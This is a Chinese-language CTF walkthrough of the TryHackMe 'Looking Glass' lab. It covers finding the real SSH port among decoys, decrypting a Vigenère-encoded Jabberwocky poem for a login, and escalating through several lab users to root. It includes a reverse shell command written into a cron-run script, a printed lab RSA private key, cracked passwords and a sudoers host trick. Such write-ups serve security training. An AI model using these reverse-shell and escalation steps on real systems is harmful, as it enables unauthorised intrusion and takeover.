共计 17102 个字符,预计需要花费 43 分钟才能阅读完成。
服务发现
┌──(root💀kali)-[~/tryhackme]
└─# nmap -sV -Pn 10.10.189.27
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 (https://nmap.org) at 2021-10-08 04:11 EDT
Nmap scan report for 10.10.163.86
Host is up (1.1s latency).
Not shown: 916 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
9000/tcp open ssh Dropbear sshd (protocol 2.0)
9001/tcp open ssh Dropbear sshd (protocol 2.0)
9002/tcp open ssh Dropbear sshd (protocol 2.0)
9003/tcp open ssh Dropbear sshd (protocol 2.0)
9009/tcp open ssh Dropbear sshd (protocol 2.0)
9010/tcp open ssh Dropbear sshd (protocol 2.0)
9011/tcp open ssh Dropbear sshd (protocol 2.0)
9040/tcp open ssh Dropbear sshd (protocol 2.0)
9050/tcp open ssh Dropbear sshd (protocol 2.0)
9071/tcp open ssh Dropbear sshd (protocol 2.0)
9080/tcp open ssh Dropbear sshd (protocol 2.0)
9081/tcp open ssh Dropbear sshd (protocol 2.0)
9090/tcp open ssh Dropbear sshd (protocol 2.0)
9091/tcp open ssh Dropbear sshd (protocol 2.0)
9099/tcp open ssh Dropbear sshd (protocol 2.0)
9100/tcp open jetdirect?
9101/tcp open jetdirect?
9102/tcp open jetdirect?
9103/tcp open jetdirect?
9110/tcp open ssh Dropbear sshd (protocol 2.0)
9111/tcp open ssh Dropbear sshd (protocol 2.0)
9200/tcp open ssh Dropbear sshd (protocol 2.0)
9207/tcp open ssh Dropbear sshd (protocol 2.0)
9220/tcp open ssh Dropbear sshd (protocol 2.0)
9290/tcp open ssh Dropbear sshd (protocol 2.0)
9415/tcp open ssh Dropbear sshd (protocol 2.0)
9418/tcp open ssh Dropbear sshd (protocol 2.0)
9485/tcp open ssh Dropbear sshd (protocol 2.0)
9500/tcp open ssh Dropbear sshd (protocol 2.0)
9502/tcp open ssh Dropbear sshd (protocol 2.0)
9503/tcp open ssh Dropbear sshd (protocol 2.0)
9535/tcp open ssh Dropbear sshd (protocol 2.0)
9575/tcp open ssh Dropbear sshd (protocol 2.0)
9593/tcp open ssh Dropbear sshd (protocol 2.0)
9594/tcp open ssh Dropbear sshd (protocol 2.0)
9595/tcp open ssh Dropbear sshd (protocol 2.0)
9618/tcp open ssh Dropbear sshd (protocol 2.0)
9666/tcp open ssh Dropbear sshd (protocol 2.0)
9876/tcp open ssh Dropbear sshd (protocol 2.0)
9877/tcp open ssh Dropbear sshd (protocol 2.0)
9878/tcp open ssh Dropbear sshd (protocol 2.0)
9898/tcp open ssh Dropbear sshd (protocol 2.0)
9900/tcp open ssh Dropbear sshd (protocol 2.0)
9917/tcp open ssh Dropbear sshd (protocol 2.0)
9929/tcp open ssh Dropbear sshd (protocol 2.0)
9943/tcp open ssh Dropbear sshd (protocol 2.0)
9944/tcp open ssh Dropbear sshd (protocol 2.0)
9968/tcp open ssh Dropbear sshd (protocol 2.0)
9998/tcp open ssh Dropbear sshd (protocol 2.0)
9999/tcp open ssh Dropbear sshd (protocol 2.0)
10000/tcp open ssh Dropbear sshd (protocol 2.0)
10001/tcp open ssh Dropbear sshd (protocol 2.0)
10002/tcp open ssh Dropbear sshd (protocol 2.0)
10003/tcp open ssh Dropbear sshd (protocol 2.0)
10004/tcp open ssh Dropbear sshd (protocol 2.0)
10009/tcp open ssh Dropbear sshd (protocol 2.0)
10010/tcp open ssh Dropbear sshd (protocol 2.0)
10012/tcp open ssh Dropbear sshd (protocol 2.0)
10024/tcp open ssh Dropbear sshd (protocol 2.0)
10025/tcp open ssh Dropbear sshd (protocol 2.0)
10082/tcp open ssh Dropbear sshd (protocol 2.0)
10180/tcp open ssh Dropbear sshd (protocol 2.0)
10215/tcp open ssh Dropbear sshd (protocol 2.0)
10243/tcp open ssh Dropbear sshd (protocol 2.0)
10566/tcp open ssh Dropbear sshd (protocol 2.0)
10616/tcp open ssh Dropbear sshd (protocol 2.0)
10617/tcp open ssh Dropbear sshd (protocol 2.0)
10621/tcp open ssh Dropbear sshd (protocol 2.0)
10626/tcp open ssh Dropbear sshd (protocol 2.0)
10628/tcp open ssh Dropbear sshd (protocol 2.0)
10629/tcp open ssh Dropbear sshd (protocol 2.0)
10778/tcp open ssh Dropbear sshd (protocol 2.0)
11110/tcp open ssh Dropbear sshd (protocol 2.0)
11111/tcp open ssh Dropbear sshd (protocol 2.0)
11967/tcp open ssh Dropbear sshd (protocol 2.0)
12000/tcp open ssh Dropbear sshd (protocol 2.0)
12174/tcp open ssh Dropbear sshd (protocol 2.0)
12265/tcp open ssh Dropbear sshd (protocol 2.0)
12345/tcp open ssh Dropbear sshd (protocol 2.0)
13456/tcp open ssh Dropbear sshd (protocol 2.0)
13722/tcp open ssh Dropbear sshd (protocol 2.0)
13782/tcp open ssh Dropbear sshd (protocol 2.0)
13783/tcp open ssh Dropbear sshd (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
太操蛋了。。。
看上去开了很多 ssh 端口,开启 -p-
从新扫了一次,扫描出更多 ssh 端口
尝试用连贯下面的 ssh 端口,会一直的提醒 Higher
或者lower
咱们当然不须要一个个端口去测试,只须要不停的折半查找,那么在对数次数内咱们就能够找到实在端口
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12000
The authenticity of host '[10.10.189.27]:12000 ([10.10.189.27]:12000)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12000' (RSA) to the list of known hosts.
Lower
Connection to 10.10.189.27 closed.
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12174
The authenticity of host '[10.10.189.27]:12174 ([10.10.189.27]:12174)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12174' (RSA) to the list of known hosts.
Higher
Connection to 10.10.189.27 closed.
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12100
The authenticity of host '[10.10.189.27]:12100 ([10.10.189.27]:12100)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12100' (RSA) to the list of known hosts.
Higher
Connection to 10.10.189.27 closed.
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12050
The authenticity of host '[10.10.189.27]:12050 ([10.10.189.27]:12050)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12050' (RSA) to the list of known hosts.
Higher
Connection to 10.10.189.27 closed.
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12025
The authenticity of host '[10.10.189.27]:12025 ([10.10.189.27]:12025)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12025' (RSA) to the list of known hosts.
Lower
Connection to 10.10.189.27 closed.
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12030
The authenticity of host '[10.10.189.27]:12030 ([10.10.189.27]:12030)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12030' (RSA) to the list of known hosts.
Higher
Connection to 10.10.189.27 closed.
最初定位到端口:12027
留神,这个端口每次 reboot 的时候都会变动
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh root@10.10.189.27 -p 12027
The authenticity of host '[10.10.189.27]:12027 ([10.10.189.27]:12027)' can't be established.
RSA key fingerprint is SHA256:iMwNI8HsNKoZQ7O0IFs1Qt8cf0ZDq2uI8dIK97XGPj0.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.189.27]:12027' (RSA) to the list of known hosts.
You've found the real service.
Solve the challenge to get access to the box
Jabberwocky
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
'Fvphve ewl Jbfugzlvgb, ff woy!
Ioe kepu bwhx sbai, tst jlbal vppa grmjl!
Bplhrf xag Rjinlu imro, pud tlnp
Bwl jintmofh Iaohxtachxta!'
Oi tzdr hjw oqzehp jpvvd tc oaoh:
Eqvv amdx ale xpuxpqx hwt oi jhbkhe--
Hv rfwmgl wl fp moi Tfbaun xkgm,
Puh jmvsd lloimi bp bwvyxaa.
Eno pz io yyhqho xyhbkhe wl sushf,
Bwl Nruiirhdjk, xmmj mnlw fy mpaxt,
Jani pjqumpzgn xhcdbgi xag bjskvr dsoo,
Pud cykdttk ej ba gaxt!
Vnf, xpq! Wcl, xnh! Hrd ewyovka cvs alihbkh
Ewl vpvict qseux dine huidoxt-achgb!
Al peqi pt eitf, ick azmo mtd wlae
Lx ymca krebqpsxug cevm.
'Ick lrla xhzj zlbmg vpt Qesulvwzrr?
Cpqx vw bf eifz, qy mthmjwa dwn!
V jitinofh kaz! Gtntdvl! Ttspaj!'Wl ciskvttk me apw jzn.'Awbw utqasmx, tuh tst zljxaa bdcij
Wph gjgl aoh zkuqsi zg ale hpie;
Bpe oqbzc nxyi tst iosszqdtz,
Eew ale xdte semja dbxxkhfe.
Jdbr tivtmi pw sxderpIoeKeudmgdstd
Enter Secret:
当初咱们拿到一个加密文本。Jabberwocky
在爱丽丝的故事里是一首废话诗
对于这个背景能够参考维基百科
依据下面的背景常识咱们能够拿到一段明文:
'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe
All mimsy were the borogoves,
And the mome raths outgrabe.
对应的密文就是下面的第一段:
'Mdes mgplmmz, cvs alv lsmtsn aowil
Fqs ncix hrd rxtbmi bp bwl arul;
Elw bpmtc pgzt alv uvvordcet,
Egf bwl qffl vaewz ovxztiql.
咱们猜想这里用的是维吉利亚加密,那么在晓得明文和密文的状况下,咱们如何晓得加密的秘钥?
我搜寻到了这个页面
这里说了一句:
Take the ciphertext and decrypt it with the plaintext as the key. If it was vigenere, you’ll see the real key pop out. Which is the case here.
用明文作为秘钥,解密已加密的文本,得进去的就是秘钥
去到这个网站
咱们把头两行加密文本去除标点当前作为待解密文本:MdesmgplmmzcvsalvlsmtsnaowilFqsncixhrdrxtbmibpbwlarul
把头两行的明文去除标点当前作为解密的秘钥:TwasbrilligandtheslithytovesDidgyreandgimbleinthewabe
解密进去当前是:ThealphabetcipherthealphabetCipherthealphabetcipherth
咱们察看,期中 thealphabetcipher
这个字符串在解密密文里重复呈现,所以这个就是咱们的解密秘钥
咱们用下面的秘钥解密整个加密诗文
Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.
'Beware the Jabberwock, my son!
The jaws that bite, the claws that catch!
Beware the Jubjub bird, and shun
The frumious Bandersnatch!'
He took his vorpal sword in hand:
Long time the manxome foe he sought--
So rested he by the Tumtum tree,
And stood awhile in thought.
And as in uffish thought he stood,
The Jabberwock, with eyes of flame,
Came whiffling through the tulgey wood,
And burbled as it came!
One, two! One, two! And through and through
The vorpal blade went snicker-snack!
He left it dead, and with its head
He went galumphing back.
'And hast thou slain the Jabberwock?
Come to my arms, my beamish boy!
O frabjous day! Callooh! Callay!'He chortled in his joy.'Twas brillig, and the slithy toves
Did gyre and gimble in the wabe;
All mimsy were the borogoves,
And the mome raths outgrabe.
Your secret is bewareTheJabberwock
secret 是:bewareTheJabberwock
ssh 里填入 secret,失去一个 ssh 的登陆凭证
小声 bb:这个 ssh 明码每次 reboot 的时候也会变动,所以万不得已千万不要重启,不然下面猜端口又要重来一次。。。
Enter Secret:
jabberwock:InventedBackwardsGreedilyYours
user 1:jabberwock
登陆 ssh,查看 user.txt
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh jabberwock@10.10.189.27
jabberwock@10.10.189.27's password:
Last login: Fri Jul 3 03:05:33 2020 from 192.168.170.1
jabberwock@looking-glass:~$ ls
poem.txt twasBrillig.sh user.txt
jabberwock@looking-glass:~$ cat user.txt
}32a911966cab2d643f5d57d9e0173d56{mht
依照这个房间的尿性,显然这也不是一个实在的 user flag
去到这个网站, 失去一个 reverse 的串就是 user flag
查看本用户的 root 权限,能够应用 reboot 命令
jabberwock@looking-glass:~$ sudo -l
Matching Defaults entries for jabberwock on looking-glass:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jabberwock may run the following commands on looking-glass:
(root) NOPASSWD: /sbin/reboot
查看定时工作,tweedledum 这个用户,每次 reboot 的时候都会执行 /home/jabberwock/twasBrillig.sh
jabberwock@looking-glass:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.daily)
47 6 * * 7 root test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.weekly)
52 6 1 * * root test -x /usr/sbin/anacron || (cd / && run-parts --report /etc/cron.monthly)
#
@reboot tweedledum bash /home/jabberwock/twasBrillig.sh
咱们把上面的 payload 写进 /home/jabberwock/twasBrillig.sh
jabberwock@looking-glass:~$ echo "bash -i >& /dev/tcp/10.13.21.169/4242 0>&1">>/home/jabberwock/twasBrillig.sh
jabberwock@looking-glass:~$ cat /home/jabberwock/twasBrillig.sh
wall $(cat /home/jabberwock/poem.txt)
bash -i >& /dev/tcp/10.13.21.169/4242 0>&1
另外开启一个监听窗口,reboot 这个机器 ….
拿到另一个用户 tweedledum
的 shell
user 2 tweedledum
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# nc -lnvp 4242 1 ⨯
listening on [any] 4242 ...
connect to [10.13.21.169] from (UNKNOWN) [10.10.189.27] 52236
bash: cannot set terminal process group (881): Inappropriate ioctl for device
bash: no job control in this shell
tweedledum@looking-glass:~$ whoami
whoami
tweedledum
tweedledum@looking-glass:~$ id
id
uid=1002(tweedledum) gid=1002(tweedledum) groups=1002(tweedledum)
tweedledum@looking-glass:~$
tweedledum 用于 bash 的 root 权限,然而须要明码
tweedledum@looking-glass:~$ sudo -l
sudo -l
Matching Defaults entries for tweedledum on looking-glass:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User tweedledum may run the following commands on looking-glass:
(tweedledee) NOPASSWD: /bin/bash
$ python3 -c 'import pty; pty.spawn("/bin/sh")'
$ sudo /bin/bash
sudo /bin/bash
[sudo] password for tweedledum:
Sorry, try again.
[sudo] password for tweedledum:
Sorry, try again.
[sudo] password for tweedledum:
在此目录下有两个文件
$ ls
ls
humptydumpty.txt poem.txt
$ cat humptydumpty.txt
cat humptydumpty.txt
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431ed
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404f
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
$ cat poem.txt
cat poem.txt
'Tweedledum and Tweedledee
Agreed to have a battle;
For Tweedledum said Tweedledee
Had spoiled his nice new rattle.
Just then flew down a monstrous crow,
As black as a tar-barrel;
Which frightened both the heroes so,
They quite forgot their quarrel.'
humptydumpty.txt 里的是 sha256 加密密文,去到这个网站解密后的后果如下:
dcfff5eb40423f055a4cd0a8d7ed39ff6cb9816868f5766b4088b9e9906961b9
maybe
7692c3ad3540bb803c020b3aee66cd8887123234ea0c6e7143c0add73ff431edone
28391d3bc64ec15cbb090426b04aa6b7649c3cc85f11230bb0105e02d15e3624of
b808e156d18d1cecdcc1456375f8cae994c36549a07c8c2315b473dd9d7f404fthese
fa51fd49abf67705d6a35d18218c115ff5633aec1f9ebfdc9d5d4956416f57f6is
b9776d7ddf459c9ad5b0e1d6ac61e27befb5e99fd62446677600d7cacef544d0the
5e884898da28047151d0e56f8dc6292773603d0d6aabbdd62a11ef721d1542d8password
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b(这个解不进去..)
7468652070617373776f7264206973207a797877767574737271706f6e6d6c6b
看上去像 sha256,但其实是 hex
在 hackbar 外面抉择 ENCODING->Hexadecimal decode
失去明文:the password is zyxwvutsrqponmlk
查看 /etc/passwd
,humptydumpty
是期中一个用户
$ cat /etc/passwd
cat /etc/passwd
...
...
tryhackme:x:1000:1000:TryHackMe:/home/tryhackme:/bin/bash
jabberwock:x:1001:1001:,,,:/home/jabberwock:/bin/bash
tweedledum:x:1002:1002:,,,:/home/tweedledum:/bin/bash
tweedledee:x:1003:1003:,,,:/home/tweedledee:/bin/bash
humptydumpty:x:1004:1004:,,,:/home/humptydumpty:/bin/bash
alice:x:1005:1005:Alice,,,:/home/alice:/bin/bash
user 3 humptydumpty
切换到 humptydumpty 的账号
su humptydumpty
Password: zyxwvutsrqponmlk
humptydumpty@looking-glass:/home$ cd humptydumpty
cd humptydumpty
humptydumpty@looking-glass:~$ ls
ls
poetry.txt
在 home 目录查看用户权限,其余用户组对 alice 都有执行权限
humptydumpty@looking-glass:/home$ ls -al
ls -al
total 32
drwxr-xr-x 8 root root 4096 Jul 3 2020 .
drwxr-xr-x 24 root root 4096 Jul 2 2020 ..
drwx--x--x 6 alice alice 4096 Jul 3 2020 alice
drwx------ 3 humptydumpty humptydumpty 4096 Oct 9 08:52 humptydumpty
drwxrwxrwx 6 jabberwock jabberwock 4096 Oct 9 07:32 jabberwock
drwx------ 5 tryhackme tryhackme 4096 Jul 3 2020 tryhackme
drwx------ 3 tweedledee tweedledee 4096 Jul 3 2020 tweedledee
drwx------ 2 tweedledum tweedledum 4096 Jul 3 2020 tweedledum
这里我是参考大佬的 writeup 的,很 trick 的是能够查看到 alice 的 ssh 私钥文件。。
cat alice/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpgIBAAKCAQEAxmPncAXisNjbU2xizft4aYPqmfXm1735FPlGf4j9ExZhlmmD
NIRchPaFUqJXQZi5ryQH6YxZP5IIJXENK+a4WoRDyPoyGK/63rXTn/IWWKQka9tQ
2xrdnyxdwbtiKP1L4bq/4vU3OUcA+aYHxqhyq39arpeceHVit+jVPriHiCA73k7g
HCgpkwWczNa5MMGo+1Cg4ifzffv4uhPkxBLLl3f4rBf84RmuKEEy6bYZ+/WOEgHl
fks5ngFniW7x2R3vyq7xyDrwiXEjfW4yYe+kLiGZyyk1ia7HGhNKpIRufPdJdT+r
NGrjYFLjhzeWYBmHx7JkhkEUFIVx6ZV1y+gihQIDAQABAoIBAQDAhIA5kCyMqtQj
X2F+O9J8qjvFzf+GSl7lAIVuC5Ryqlxm5tsg4nUZvlRgfRMpn7hJAjD/bWfKLb7j
/pHmkU1C4WkaJdjpZhSPfGjxpK4UtKx3Uetjw+1eomIVNu6pkivJ0DyXVJiTZ5jF
ql2PZTVpwPtRw+RebKMwjqwo4k77Q30r8Kxr4UfX2hLHtHT8tsjqBUWrb/jlMHQO
zmU73tuPVQSESgeUP2jOlv7q5toEYieoA+7ULpGDwDn8PxQjCF/2QUa2jFalixsK
WfEcmTnIQDyOFWCbmgOvik4Lzk/rDGn9VjcYFxOpuj3XH2l8QDQ+GO+5BBg38+aJ
cUINwh4BAoGBAPdctuVRoAkFpyEofZxQFqPqw3LZyviKena/HyWLxXWHxG6ji7aW
DmtVXjjQOwcjOLuDkT4QQvCJVrGbdBVGOFLoWZzLpYGJchxmlR+RHCb40pZjBgr5
8bjJlQcp6pplBRCF/OsG5ugpCiJsS6uA6CWWXe6WC7r7V94r5wzzJpWBAoGBAM1R
aCg1/2UxIOqxtAfQ+WDxqQQuq3szvrhep22McIUe83dh+hUibaPqR1nYy1sAAhgy
wJohLchlq4E1LhUmTZZquBwviU73fNRbID5pfn4LKL6/yiF/GWd+Zv+t9n9DDWKi
WgT9aG7N+TP/yimYniR2ePu/xKIjWX/uSs3rSLcFAoGBAOxvcFpM5Pz6rD8jZrzs
SFexY9P5nOpn4ppyICFRMhIfDYD7TeXeFDY/yOnhDyrJXcbOARwjivhDLdxhzFkx
X1DPyif292GTsMC4xL0BhLkziIY6bGI9efC4rXvFcvrUqDyc9ZzoYflykL9KaCGr
+zlCOtJ8FQZKjDhOGnDkUPMBAoGBAMrVaXiQH8bwSfyRobE3GaZUFw0yreYAsKGj
oPPwkhhxA0UlXdITOQ1+HQ79xagY0fjl6rBZpska59u1ldj/BhdbRpdRvuxsQr3n
aGs//N64V4BaKG3/CjHcBhUA30vKCicvDI9xaQJOKardP/Ln+xM6lzrdsHwdQAXK
e8wCbMuhAoGBAOKy5OnaHwB8PcFcX68srFLX4W20NN6cFp12cU2QJy2MLGoFYBpa
dLnK/rW4O0JxgqIV69MjDsfRn1gZNhTTAyNnRMH1U7kUfPUB2ZXCmnCGLhAGEbY9
k6ywCnCtTz2/sNEgNcx9/iZW+yVEm/4s9eonVimF+u19HJFOPJsAYxx0
-----END RSA PRIVATE KEY-----
把下面信息复制到本地成 id_rsa 文件,用 ssh 登录 alice 账号
user 4 alice
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# chmod 600 id_rsa
┌──(root💀kali)-[~/tryhackme/lookingglass]
└─# ssh -i id_rsa alice@10.10.189.27
Last login: Fri Jul 3 02:42:13 2020 from 192.168.170.1
alice@looking-glass:~$ id
uid=1005(alice) gid=1005(alice) groups=1005(alice)
alice@looking-glass:~$ whoami
alice
不能应用 sudo -l,因为不晓得明码
有一个 txt 文件,然而没有什么卵用不必管
全局寻找 alice 相干的文件
alice@looking-glass:/$ find / -name *alice* -type f 2>/dev/null
/etc/sudoers.d/alice
````
查看这个文件, 能够应用 bash
alice@looking-glass:/$ cat /etc/sudoers.d/alice
alice ssalg-gnikool = (root) NOPASSWD: /bin/bash
在下面这条命令里
>alice 用户名
>ssalg-gnikool 主机名
>/bin/bash 能够执行的命令
#提权到 root。>- h 参数有帮忙菜单(display gelp message and exit),也有在主机上运行命令的意思(run command on host)
alice@looking-glass:/$ sudo -h ssalg-gnikool /bin/bash
sudo: unable to resolve host ssalg-gnikool
root@looking-glass:/# id
uid=0(root) gid=0(root) groups=0(root)
root@looking-glass:/# cat /root/root.txt
}f3dae6dec817ad10b750d79f6b7332cb{mht